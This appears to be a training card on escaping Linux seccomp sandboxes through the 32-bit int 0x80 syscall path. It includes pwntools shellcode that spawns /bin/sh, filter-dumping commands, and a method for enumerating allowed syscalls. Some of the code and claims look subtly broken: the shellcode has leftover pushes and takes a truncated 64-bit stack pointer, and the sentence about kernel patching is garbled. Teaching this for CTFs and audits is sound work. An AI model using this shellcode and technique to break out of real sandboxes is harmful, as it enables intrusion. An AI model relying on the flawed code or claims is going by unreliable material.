Advanced seccomp Bypass: 32-Bit int 0x80 Syscall Table Exploitation Outside 64-Bit Filter Coverage

binary_exploitation Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Advanced seccomp bypasses exploit mismatches between the filter's assumptions and the actual kernel syscall dispatch mechanism. The most reliable advanced technique is using 32-bit syscall entry (int 0x80) in a 64-bit process: if the BPF filter checks 64-bit syscall numbers but does not explicitly handle IA32 compatibility mode, a 32-bit execve (syscall number 11 in x86, not 59 in x86_64) passes through unchecked. This bypass has been demonstrated in multiple CTF competitions and real hardening audits. NICE S0131 (develop exploits) and T0286 (develop cyber tools) require familiarity with the kernel's dual syscall path and how to craft shellcode that exploits mode gaps.

Core Concept

Two syscall entry points on x86_64 Linux: 1. syscall instruction: invokes the 64-bit syscall table (sys_call_table). Syscall numbers from <asm/unistd_64.h>. 2. int 0x80 instruction: invokes the 32-bit IA32 compatibility syscall table (ia32_sys_call_table). Syscall numbers from <asm/unistd_32.h>.

A seccomp BPF filter written for a 64-bit process typically checks the syscall number loaded from offsetof(struct seccomp_data, nr) — which is the 64-bit syscall number when the syscall instruction is used, or the 32-bit syscall number when int 0x80 is used. However, the architecture field (offsetof(struct seccomp_data, arch)) differs: - syscall on x86_64: arch = AUDIT_ARCH_X86_64 = 0xC000003E - int 0x80 on x86_64 process: arch = AUDIT_ARCH_I386 = 0x40000003

A well-written filter blocks the I386 architecture immediately:

A = arch
if (A != ARCH_X86_64) KILL    # blocks int 0x80 path

A poorly written filter only checks the syscall number without checking the architecture — in that case, int 0x80 with a 32-bit syscall number that maps to an allowed 64-bit syscall number passes through.

SECCOMP_RET_ERRNO vs SECCOMP_RET_KILL: - SECCOMP_RET_ERRNO | errnum: the syscall returns -errnum to the process. The process continues running. An attacker who handles the error can attempt alternative paths. - SECCOMP_RET_KILL_THREAD: the offending thread is killed immediately. Unrecoverable. - SECCOMP_RET_KILL_PROCESS (since Linux 4.14): the entire process group is killed.

In ERRNO mode, an attacker can use the error return to enumerate which syscalls are allowed: try each one, if it returns EPERM (or the configured errno) it is blocked; if it returns any other error (including ENOSYS for nonexistent syscalls) or succeeds, it is allowed.

Technical Deep-Dive

Detecting the architecture check in seccomp-tools output:

seccomp-tools dump ./challenge
# Look for architecture check at the top:
#  0000: 0x20 0x00 0x00 0x00000004   A = arch
#  0001: 0x15 0x00 0x08 0xc000003e   if (A != ARCH_X86_64) goto KILL
# If lines 0000-0001 are MISSING, the filter doesn't check arch -> int 0x80 bypass possible

Crafting 32-bit shellcode for int 0x80 bypass in a 64-bit process:

from pwn import *

context.arch = 'amd64'   # binary is 64-bit

# 32-bit execve via int 0x80:
# eax=11 (execve in i386), ebx=ptr_to_"/bin/sh", ecx=0, edx=0
# IMPORTANT: in a 64-bit process, int 0x80 uses the i386 syscall table
# but addresses are still 64-bit. However, int 0x80 only sees the low 32 bits of args.
# This works if /bin/sh address fits in 32 bits (stack or low heap)

shellcode_32bit_compat = asm("""
    /* push /bin/sh onto stack (address will be low enough via mmap hint) */
    push 0x00006873          /* "sh" little-endian */
    push 0x2f6e6962          /* "/bin" little-endian   */
    /* actually: /bin/sh as bytes: 2f 62 69 6e 2f 73 68 00 */
    xor  eax, eax
    push eax                 /* null terminator */
    push 0x68732f2f          /* //sh */
    push 0x6e69622f          /* /bin */
    mov  ebx, esp            /* ebx = ptr to "/bin//sh" */
    xor  ecx, ecx            /* argv = NULL */
    xor  edx, edx            /* envp = NULL */
    mov  eax, 11             /* SYS_execve in i386 = 11 */
    int  0x80                /* 32-bit syscall entry -- bypasses 64-bit seccomp if arch not checked */
""", arch='i386')

# Combine with a 64-bit ROP chain to reach this shellcode
print(f"shellcode length: {len(shellcode_32bit_compat)}")
print(disasm(shellcode_32bit_compat, arch='i386'))

Using strace to enumerate allowed syscalls in ERRNO mode:

# If seccomp uses ERRNO mode, strace shows which calls return EPERM
strace -e trace=all ./challenge 2>&1 | grep EPERM
# Calls not returning EPERM are candidates for the allowed set

# Alternatively, use a syscall fuzzer shellcode that tries each number:
python3 -c "
from pwn import *
context.arch = 'amd64'
# Generate shellcode that tries syscall numbers 0-400 in a loop
# and writes results to a pipe -- advanced, but useful for ERRNO-mode enumeration
"

Reverse Engineering Methodology

Run seccomp-tools dump and check whether the BPF filter's first instruction loads and checks arch. If no architecture check is present, int 0x80 bypass is immediately viable.
Count the number of allowed syscalls. Very restrictive filters (only read/write/exit) require creative alternatives; permissive filters (20+ allowed) have more bypass surface.
For ERRNO-mode filters: write a short shellcode loop that tries each syscall number (0 to 400) with safe arguments (all zeros), records whether the return is EPERM or something else, and writes results to stdout. The non-EPERM set is the allowed list.
Check kernel version: int 0x80 bypass was patched in terms of seccomp_data.arch reporting correctly only after careful glibc and kernel coordination. Old kernels (< 3.5) may have other seccomp weaknesses.

Common Reversing Errors

Assuming 64-bit shellcode works with int 0x80: int 0x80 uses the 32-bit syscall table and only reads the low 32 bits of register arguments. A 64-bit pointer to /bin/sh with high bits set will be truncated. Ensure the target string is in low memory or use push to place it on the stack first.
Missing that SECCOMP_RET_TRACE requires a tracer: if the filter returns TRACE for some syscalls, those require a ptrace tracer to handle them. Without a tracer, the tracee receives ENOSYS. This is not directly exploitable but confirms the filter uses a multi-mode approach.
Confusing syscall numbers between architectures: execve is 59 on x86_64 but 11 on i386. open is 2 on x86_64 but 5 on i386. Always reference the correct unistd header for the calling convention being used.
Filter installed after fork: some challenges fork a child and install seccomp only in the child. The parent process is unrestricted. If ptrace is available, the parent can influence the child via PTRACE_POKETEXT. Check whether seccomp is per-thread or per-process.

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.